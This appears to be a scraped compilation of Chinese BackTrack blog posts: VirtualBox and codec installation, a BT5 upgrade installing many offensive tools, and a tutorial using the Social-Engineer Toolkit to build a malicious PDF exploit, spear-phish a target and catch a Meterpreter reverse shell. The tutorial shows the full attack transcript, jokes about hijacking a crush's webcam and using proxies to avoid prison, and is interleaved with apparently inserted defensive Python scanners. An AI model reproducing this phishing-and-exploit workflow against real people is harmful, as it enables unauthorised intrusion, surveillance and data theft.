VirtualBox Network Connectivity

Installed VirtualBox on BT5 and wanted the host and the VM to be able to reach each other.

Looked at several write-ups online; every one of them was all theory, and they fucking contradicted each other. Damn.

In the end I verified that the following works:

Option two: Bridged Adapter mode

What needs to be configured:

1. Host: nothing to change.

2. Turn off the firewall inside the VM!!! This one matters; otherwise ping fails. Every kind of ping failure.

3. Set the VM to get its IP from DHCP, i.e. automatic IP assignment.

Didn't try the other modes.

Installing VirtualBox on BT5

For a while I could never get this to install on BT5. Only after reading the official wiki did I learn that you have to install a specific build for it to succeed. The exact steps:

wget http://download.virtualbox.org/virtualbox/4.0.10/virtualbox-4.0_4.0.10-72479~Ubuntu~lucid_i386.deb

dpkg -i virtualbox-4.0_4.0.10-72479~Ubuntu~lucid_i386.deb

That's all it takes. For other problems see http://www.backtrack-linux.org/wiki/index.php/Install_VBox

Author: lengf

Install MPlayer and Multimedia Codecs (libdvdcss2, w32codecs, w64codecs) on Ubuntu 11.04 (Natty)

MPlayer is a movie and animation player that supports a wide range of codecs and file formats, including MPEG 1/2/4, DivX 3/4/5, Windows Media 7/8/9, RealAudio/Video up to 9, Quicktime 5/6, and Vivo 1/2. It has many MMX/SSE(2)/3DNow(Ex) optimized native audio and video codecs, but also allows using XAnim's and RealPlayer's binary codec plugins, and Win32 codec DLLs. It has basic VCD/DVD playback functionality, including DVD subtitles, but supports many text-based subtitle formats too. For video output, nearly every existing interface is supported. It's also able to convert any supported files to raw/divx/mpeg4 AVI (pcm/mp3 audio), and even grab video from V4L devices.

Install MPlayer in Ubuntu 11.04 (Natty)

Make sure you have enabled the universe and multiverse repositories.

Now run the following command to update the source list:

sudo apt-get update

Install mplayer using the following command:

sudo apt-get install mplayer

or

click on the following link:

apt://mplayer

To open MPlayer go to Applications -> Sound & Video -> MPlayer Movie Player

Install w32 video codecs and libdvdcss2 in Ubuntu 11.04 (Natty)

Support for WMV, RealMedia and other formats is bundled in the w32codecs package. This package is not available from the Ubuntu repositories due to licensing and legal restrictions. To play encrypted DVDs, the libdvdcss2 package is essential.

The following commands add Medibuntu's repository to Ubuntu. They also add Medibuntu's GPG key to your keyring, which is needed to authenticate the Medibuntu packages. Note that the keyring package itself is installed with --allow-unauthenticated, because its signature cannot be checked until the key is in place; that is the one package fetched without verification.

sudo wget http://www.medibuntu.org/sources.list.d/$(lsb_release -cs).list --output-document=/etc/apt/sources.list.d/medibuntu.list

sudo apt-get -q update

sudo apt-get --yes -q --allow-unauthenticated install medibuntu-keyring

sudo apt-get -q update

You may also wish to add the following packages. The first makes many apps from the Medibuntu repository appear in Ubuntu Software Center (Ubuntu 9.10+) or Add/Remove Applications (versions prior to 9.10). The second allows users to generate crash reports against Medibuntu packages and submit them to the Medibuntu bug tracker.

sudo apt-get --yes install app-install-data-medibuntu apport-hooks-medibuntu

Please note you may have to use --force-yes instead of --yes for this command to succeed.

For i386 users, install the codecs using the following command:

sudo apt-get install w32codecs libdvdcss2

For amd64 users, install the codecs using the following command:

sudo apt-get install w64codecs libdvdcss2

Using the repositories above you can install most of the multimedia codecs for Ubuntu.

MPlayer Plugin for Firefox

If you want to install the MPlayer plug-in for Mozilla Firefox, run the following command:

sudo apt-get install mozilla-mplayer

or click on the following link:

apt://mozilla-mplayer

[System] Quickly Upgrading BackTrack R2 to R3

BT5 R3 was just released, but I don't want to reinstall the system. Here is a very simple way to upgrade R2 to R3.
First, make sure your existing system is fully up to date:
apt-get update && apt-get dist-upgrade
Once that upgrade finishes, all that is left is to install the tools R3 added.
Note that the 32-bit and 64-bit tool sets differ slightly, so be sure to pick the right package list.
32-Bit Tools:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-Bit Tools:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
OK! Update complete.
In my own testing I found that some packages in the 32-bit list are not available, so here is a list that runs directly:
apt-get install blueranger inundator intersect mercury netgear-telnetenable jboss-autopwn deblaze apache-users kautilya lynis-audit wifihoney twofi acccheck statsprocessor iphoneanalyzer jad javasnoop ewizard websploit dnmap unix-privesc-check dhcpig intercepter-ng laudanum wifite tnscmd10g bluepot subterfuge jigsaw urlcrazy creddump android-sdk apktool ded termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

kylin: My BT5 needed an upgrade anyway; it's a dual-boot and reinstalling would be too much hassle, so I'll just use this method~~~

Permanent link to this article: http://www.kylins.org/302.html | kylin's blog | following network security and Internet news

[Professional Techniques] The Terrifying Art of Social Engineering, Season 1

I recommend buying the Chinese edition of Metasploit: The Penetration Tester's Guide mentioned in the page admin's status; it's on Amazon. Not an ad, the admin doesn't get a cut =.= It's just that for beginner script kiddies (the level of the vast majority of Chinese hackers) this book is a very good first step toward professional-level hacking.

As for spending money: should I tell you that Metasploit Pro apparently costs several thousand? Every hobby has its price, just as most of us who run BackTrack in a VM have to go and buy an external wireless adapter.

A few basics (skip ahead if you already have some pentesting background):

1° Apart from some social engineering, every intrusion relies on vulnerabilities. Most social engineering also depends on vulnerabilities. Flies don't bite an egg without a crack; life isn't a novel and hackers aren't legends, at least the vast majority aren't. The legendary hacker of fiction isn't an unreachable height: if you hold vulnerabilities 5 to 10 years ahead of the whole era, you are a legend. Even then, the scene where someone plugs in a network cable, turns on any computer and breaks in hardly ever happens, because there are no tools. However simple the tools we need are, they run to tens or hundreds of lines; writing them on the spot would kill you.

2° In practice, once you hold one or two unpublished excellent-grade vulnerabilities, you'll find many hosts are as fragile as a hymen. If you discovered those vulnerabilities yourself, congratulations, you can already send your résumé to a security company.

3° WooYun regularly publishes vulnerabilities, but even those with a high rank are mostly highly targeted and extremely narrow in applicability. And the vast majority come down to administrator negligence; these are not the broadly applicable vulnerabilities discussed above.

4° Unless you really hold vulnerabilities ahead of the era (there are certainly people and organizations holding such expensive vulnerabilities), the most terrifying thing is always social engineering. The "phishing" the Chinese hacker scene often talks about is one kind of social engineering. Social engineering is a very broad craft, nothing like the password guessing and security-question guessing that some newbies imagine.

The main text begins.
What I describe is social engineering as I understand it, one person's view; if it differs from what's introduced online, just smile and move on.
Original by 猪头

The social engineering I describe is built on the BackTrack platform, mainly the Social-Engineer Toolkit (SET). The toolkit is installed under /pentest/exploits/SET.

One: mass phishing emails.

Sounds unethical and unlikely to fool anyone, right? Reality is exactly the opposite. In 2010 many large companies, Google included, fell to the Operation Aurora attack precisely because of this kind of attack.

Everyone today is alert enough not to click strange links in emails of unknown origin, let alone download and run executables attached to them. And the antivirus and firewall on the computer aren't there for nothing. But none of that means you are safe.

Vulnerability used: exploitation of a specially crafted file-format vulnerability;
Case: an Adobe PDF vulnerability.

Register a domain that resembles the company's, such as companyxyz.com, or register a subdomain. Then send targeted emails to the target. For example, staff in Google's departments that handle external customer liaison are unlikely to refuse to read an email that looks like it came from some company, all the more so when the content is reasonable and the attachment is a PDF document with nothing abnormal about it. Then, as a matter of course, they open the PDF in the email, the overflow succeeds, and the initial penetration is complete.
How to generate and send the phishing email:
————————————————————————————
root@bt:/pentest/exploits/set# ./set

Select from the menu:

1. Spear-Phishing Attack Vectors (*)
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure “Sendmail” is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack (*)
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1

Select the file format exploit you want.

The default is the PDF embedded EXE.
********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. SET Custom Written Document UNC LM SMB Capture Attack
3. Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4. Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5. Adobe Flash Player ‘Button’ Remote Code Execution
6. Adobe CoolType SING Table ‘uniqueName’ Overflow
7. Adobe Flash Player ‘newfunction’ Invalid Pointer Use
8. Adobe Collab.collectEmailInfo Buffer Overflow (*)
9. Adobe Collab.getIcon Buffer Overflow
10. Adobe JBIG2Decode Memory Corruption Exploit
11. Adobe PDF Embedded EXE Social Engineering
12. Adobe util.printf() Buffer Overflow
13. Custom EXE to VBA (sent via RAR) (RAR required)
14. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15. Adobe PDF Embedded EXE Social Engineering (NOJS)
16. Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17. Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

Enter the number you want (press enter for default): 8

1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to
attacker.
2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back
to attacker.
3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to
attacker.
4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64),
Meterpreter
6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on
remote system.
7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter.

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443…
[*] Generating fileformat exploit…
[*] Please wait while we load the module tree…
[*] Started reverse handler on 10.10.1.112:443
[*] Creating ‘template.pdf’ file…
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of ‘template.whatever’
Do you want to rename the file?
example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care. (*)
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
———————————————————————————
The above is the process of generating the "problem" PDF. Options marked (*) are the ones we chose. Of course you can change them according to your situation and needs; for example, the PDF filename could be changed to "Three Zodiac Signs That Love Once and Are Hurt for Life.pdf" = =
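Every attachment option in the SET menu above works either through JavaScript that Adobe Reader executes (the Collab.collectEmailInfo, Collab.getIcon and util.printf entries) or through an executable embedded in the PDF. As an added defensive example, not part of the original post, here is a mail-gateway triage scanner over raw PDF bytes that counts those features, folding PDF #xx name escapes first so an escaped /JavaScript name still counts; the weights, thresholds and the constructed sample PDFs are my assumptions.

```python
import re
from collections import Counter

# Constructed samples (not real malware): a plain PDF skeleton, and one showing the
# features a SET-style attachment has (JavaScript action, embedded EXE, hex-escaped name).
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF"""

SUSPECT_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /OpenAction 5 0 R /Names << /EmbeddedFiles 6 0 R >> >> endobj
5 0 obj << /S /J#61vaScript /JS (Collab.collectEmailInfo({msg: unescape("%u4141")})) >> endobj
6 0 obj << /Names [(update.exe) 7 0 R] >> endobj
7 0 obj << /Type /Filespec /F (update.exe) /EF << /F 8 0 R >> >> endobj
8 0 obj << /Type /EmbeddedFile /Length 2 >> stream
MZ
endstream endobj
%%EOF"""

# Name objects behind the attachment types in the SET menu, weighted by how rarely a
# legitimate business document needs them (assumed weights; tune them to your mail flow).
RISKY_NAMES = {"/JS": 3, "/JavaScript": 3, "/Launch": 3, "/OpenAction": 2, "/AA": 2,
               "/EmbeddedFile": 2, "/RichMedia": 2, "/JBIG2Decode": 1}
# Strings typical of the JavaScript the Adobe Reader exploits in that menu rely on.
JS_MARKERS = (b"unescape(", b"%u", b"Collab.", b"util.printf", b"getIcon")


def normalize_names(data: bytes) -> bytes:
    """Fold PDF #xx name escapes (/J#61vaScript == /JavaScript) so escaping does not evade the scan."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Count risky features in raw PDF bytes and return a triage verdict."""
    text = normalize_names(data)
    counts = Counter()
    for name in RISKY_NAMES:
        # Whole-token match: /EmbeddedFiles (a dictionary key) must not count as /EmbeddedFile.
        counts[name] = len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z0-9])", text))
    counts["js_markers"] = sum(text.count(m) for m in JS_MARKERS)
    score = sum(w * counts[n] for n, w in RISKY_NAMES.items()) + counts["js_markers"]
    return {"counts": dict(counts), "score": score,
            "verdict": "suspicious" if score >= 4 else "benign"}
```

Scanned PDFs that fall in the benign band still deserve a real parser or a sandbox detonation; this byte-level pass is a cheap first filter, not a replacement for one.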

Next, set who you want to send it to:

————————————————————————————
Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:
1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL…have to check this out…
5: Status Report
6: Pay Raise Application Form
7: WOAAAA!!!!!!!!!! This is crazy…
8: BasketBall Tickets
9: Baby Pics
10: Have you seen this?
11: Termination List
12: How long has it been?
13: Dan Brown’s Angels & Demons

Enter the number you want to use: 5

Enter who you want to send email to: ihazomgsecurity@secmaniac.com

What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1

Enter your GMAIL email address: fakeemailaddy@gmail.com

Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails
———————————————————————————
This attack targets a single email address, attaches the previously generated PDF, and sends out a lovely, highly deceptive email. This email may let you take control of your crush's computer and then turn on her webcam. Who knows what you'll see XD

The last step: create a Metasploit listener to catch the payload's reverse connection. (PS: because it is a reverse connection, it's the victim who actively connects out to the attacker, so now you understand why I said most firewalls and antivirus won't do anything: when you are the one connecting outward, an ordinary firewall isn't going to stop you.)
———————————————————————————
Do you want to setup a listener yes or no: yes

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 10.10.1.112
LHOST => 10.10.1.112
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) >
————————————————————————————————————————————————
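The post's point that a reverse connection passes an outbound-permissive firewall is exactly why egress monitoring matters: the handler above listens on 443 but speaks no TLS, and the victim receives a 748032-byte stage right after connecting. As an added defensive example, not from the original post, here is a check over constructed flow records that flags traffic on TLS ports that does not behave like TLS; the Flow fields, the 100 kB threshold and the sample records are my assumptions, modelled on the addresses in the transcript.

```python
from dataclasses import dataclass

TLS_PORTS = {443, 8443}  # ports where the only expected protocol is TLS


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    client_first: bytes  # first payload bytes the client sent (b"" if none yet)
    server_first: bytes  # first payload bytes the server sent
    bytes_in: int        # bytes from the server during the first seconds of the flow


def looks_like_tls_client_hello(b: bytes) -> bool:
    # TLS record header: content type 0x16 (handshake), version 0x03 0x00..0x04.
    return len(b) >= 3 and b[0] == 0x16 and b[1] == 0x03 and b[2] <= 0x04


def triage(flow: Flow) -> list:
    """Reasons a flow on a TLS port does not behave like TLS; an empty list means nothing odd."""
    reasons = []
    if flow.dport not in TLS_PORTS:
        return reasons
    if flow.client_first and not looks_like_tls_client_hello(flow.client_first):
        reasons.append("client data on TLS port is not a TLS handshake")
    if not flow.client_first and flow.server_first:
        reasons.append("server speaks first: a TLS client always sends ClientHello")
    if reasons and flow.bytes_in > 100_000:
        reasons.append("large early inbound transfer, consistent with a second-stage download")
    return reasons


# Constructed flows (not captured data). The second one mirrors the transcript's session:
# the victim connects to 10.10.1.112:443, sends nothing, and the handler pushes the stage.
FLOWS = [
    Flow("10.10.1.102", "93.184.216.34", 443, bytes.fromhex("16030100"), bytes.fromhex("16030300"), 5_000),
    Flow("10.10.1.102", "10.10.1.112", 443, b"", bytes.fromhex("006a0b00"), 748_032),
    Flow("10.10.1.102", "10.10.1.7", 443, b"GET / HTTP/1.1\r\n", b"HTTP/1.1 200 OK\r\n", 1_200),
    Flow("10.10.1.102", "10.10.1.1", 53, b"\x12\x34\x01\x00", b"\x12\x34\x81\x80", 120),
]


def flagged(flows=FLOWS) -> dict:
    """Map 'src->dst:port' to its reasons, for every flow that triage() finds suspicious."""
    return {f"{f.src}->{f.dst}:{f.dport}": triage(f) for f in flows if triage(f)}
```

An outbound proxy that only forwards valid TLS on 443, or a firewall rule that restricts 443 egress to the proxy, turns the same observation into a block rather than an alert.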

When the other side opens your PDF and you run the commands below, what you see on your end will look like this:
———————————————————————————
[*] Started reverse handler on 10.10.1.112:443
[*] Starting the payload handler…
msf exploit(handler) > [*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58087)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > shell
Process 2976 created.
Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Bob\Desktop>
———————————————————————————
See the end? It's no longer BackTrack's Linux command line but XP's pseudo-DOS prompt. You have obtained the other side's shell. From here you can do everything.

(PS: Good use of proxies and pivots will greatly extend the time you spend outside prison)

That's it for today; the admin is so sleepy, boohoo. This is the first kind of professional social engineering; more updates to come ^_^

Oh, the admin forgot to cover the preparatory social engineering for things like password guessing T^T I'll try to add it in the next update, which may be the afternoon of the 9th = = The admin has finals, so don't blame me for the gap... but I won't abandon it ~\(≧▽≦)/~ lalala

猪头, early morning of 2012.5.9
When reposting, please credit the source: http://page.renren.com/601190241/note/844956388